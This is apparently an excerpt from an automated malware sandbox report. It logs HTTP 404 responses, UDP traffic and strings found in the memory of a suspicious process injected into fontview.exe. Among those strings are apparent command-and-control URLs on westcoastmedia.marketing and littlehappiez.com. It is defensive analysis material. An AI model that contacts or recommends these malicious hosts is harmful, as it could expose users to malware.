            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 10 Nov 2023 08:30:46 GMTvary: User-Agentaccess-control-allow-origin: *access-control-allow-methods: GET,POST,OPTIONS,DELETEData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 10 Nov 2023 08:30:49 GMTvary: User-Agentaccess-control-allow-origin: *access-control-allow-methods: GET,POST,OPTIONS,DELETEData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 10 Nov 2023 08:30:52 GMTvary: User-Agentaccess-control-allow-origin: *access-control-allow-methods: GET,POST,OPTIONS,DELETEData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 10 Nov 2023 08:30:56 GMTvary: User-Agentaccess-control-allow-origin: *access-control-allow-methods: GET,POST,OPTIONS,DELETEData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: fontview.exe, 0000000C.00000003.1531285109.0000000007D1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
            Source: fontview.exe, 0000000C.00000003.1531285109.0000000007D1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
            Source: fontview.exe, 0000000C.00000003.1531285109.0000000007D1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
            Source: fontview.exe, 0000000C.00000003.1531285109.0000000007D1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
            Source: fontview.exe, 0000000C.00000003.1531285109.0000000007D1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
            Source: fontview.exe, 0000000C.00000003.1531285109.0000000007D1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
            Source: fontview.exe, 0000000C.00000003.1531285109.0000000007D1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
            Source: fontview.exe, 0000000C.00000003.1531285109.0000000007D1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
            Source: fontview.exe, 0000000C.00000003.1531285109.0000000007D1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
            Source: fontview.exe, 0000000C.00000003.1531285109.0000000007D1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
            Source: fontview.exe, 0000000C.00000003.1531285109.0000000007D1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
            Source: fontview.exe, 0000000C.00000003.1531285109.0000000007D1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
            Source: fontview.exe, 0000000C.00000002.3736597685.000000000643E000.00000004.10000000.00040000.00000000.sdmp, fontview.exe, 0000000C.00000002.3738584220.0000000007340000.00000004.00000800.00020000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.000000000438E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://domshow.vhostgo.com/template/img/paimai/banner_jiaoyi.jpg)
            Source: fontview.exe, 0000000C.00000002.3736597685.000000000643E000.00000004.10000000.00040000.00000000.sdmp, fontview.exe, 0000000C.00000002.3738584220.0000000007340000.00000004.00000800.00020000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.000000000438E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://domshow.vhostgo.com/template/img/paimai/jiaoyixq_jiaoyi.jpg)
            Source: fontview.exe, 0000000C.00000002.3736597685.000000000548A000.00000004.10000000.00040000.00000000.sdmp, fontview.exe, 0000000C.00000002.3736597685.0000000006762000.00000004.10000000.00040000.00000000.sdmp, fontview.exe, 0000000C.00000002.3736597685.0000000005AD2000.00000004.10000000.00040000.00000000.sdmp, fontview.exe, 0000000C.00000002.3738584220.0000000007340000.00000004.00000800.00020000.00000000.sdmp, fontview.exe, 0000000C.00000002.3736597685.0000000005F88000.00000004.10000000.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.00000000033DA000.00000004.00000001.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.0000000003A22000.00000004.00000001.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.00000000046B2000.00000004.00000001.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.0000000003ED8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://img.sedoparking.com
            Source: fontview.exe, 0000000C.00000003.1531285109.0000000007D1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
            Source: fontview.exe, 0000000C.00000003.1531285109.0000000007D1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
            Source: fontview.exe, 0000000C.00000003.1531285109.0000000007D1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
            Source: fontview.exe, 0000000C.00000003.1531285109.0000000007D1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
            Source: fontview.exe, 0000000C.00000003.1531285109.0000000007D1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
            Source: xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3737944932.000000000505E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.westcoastmedia.marketing
            Source: xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3737944932.000000000505E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.westcoastmedia.marketing/udwf/
            Source: fontview.exe, 0000000C.00000003.1529295683.0000000007688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: fontview.exe, 0000000C.00000003.1583119919.0000000007DD2000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000C.00000003.1531285109.0000000007D1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
            Source: fontview.exe, 0000000C.00000003.1529295683.0000000007688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: fontview.exe, 0000000C.00000003.1529295683.0000000007688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: fontview.exe, 0000000C.00000003.1529295683.0000000007688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: fontview.exe, 0000000C.00000003.1583119919.0000000007DD2000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000C.00000003.1531285109.0000000007D1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crash-reports.mozilla.com/submit?id=
            Source: fontview.exe, 0000000C.00000003.1529295683.0000000007688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: fontview.exe, 0000000C.00000003.1529295683.0000000007688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: fontview.exe, 0000000C.00000003.1529295683.0000000007688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: fontview.exe, 0000000C.00000002.3736597685.0000000005DF6000.00000004.10000000.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.0000000003D46000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js
            Source: fontview.exe, 0000000C.00000002.3736597685.0000000005DF6000.00000004.10000000.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.0000000003D46000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js
            Source: fontview.exe, 0000000C.00000002.3736597685.0000000005DF6000.00000004.10000000.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.0000000003D46000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js
            Source: fontview.exe, 0000000C.00000003.1583119919.0000000007DD2000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000C.00000003.1531285109.0000000007D1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
            Source: fontview.exe, 0000000C.00000002.3736597685.0000000005DF6000.00000004.10000000.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.0000000003D46000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?
            Source: fontview.exe, 0000000C.00000002.3736597685.000000000643E000.00000004.10000000.00040000.00000000.sdmp, fontview.exe, 0000000C.00000002.3738584220.0000000007340000.00000004.00000800.00020000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.000000000438E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?352bf0fb165ca7ab634d3cea879c7a72
            Source: fontview.exe, 0000000C.00000002.3736597685.0000000005DF6000.00000004.10000000.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.0000000003D46000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.369a663b08a55d305b97.js
            Source: fontview.exe, 0000000C.00000002.3736597685.0000000005DF6000.00000004.10000000.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.0000000003D46000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/index.442d968fe56a55df4c76.css
            Source: fontview.exe, 0000000C.00000002.3736597685.000000000548A000.00000004.10000000.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.00000000033DA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://img.sedoparking.com/templates/bg/NameSiloLogo.png
            Source: fontview.exe, 0000000C.00000002.3736597685.0000000006762000.00000004.10000000.00040000.00000000.sdmp, fontview.exe, 0000000C.00000002.3736597685.0000000005AD2000.00000004.10000000.00040000.00000000.sdmp, fontview.exe, 0000000C.00000002.3738584220.0000000007340000.00000004.00000800.00020000.00000000.sdmp, fontview.exe, 0000000C.00000002.3736597685.0000000005F88000.00000004.10000000.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.0000000003A22000.00000004.00000001.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.00000000046B2000.00000004.00000001.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.0000000003ED8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://img.sedoparking.com/templates/images/hero_nc.svg
            Source: fontview.exe, 0000000C.00000003.1583119919.0000000007DD2000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000C.00000003.1531285109.0000000007D1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
            Source: fontview.exe, 0000000C.00000002.3736597685.00000000052F8000.00000004.10000000.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.0000000003248000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://littlehappiez.com/udwf?G0Yxd2Q=d3XFPJoaQLbhU6h03
            Source: fontview.exe, 0000000C.00000002.3733416579.0000000002BE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: fontview.exe, 0000000C.00000002.3733416579.0000000002BE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
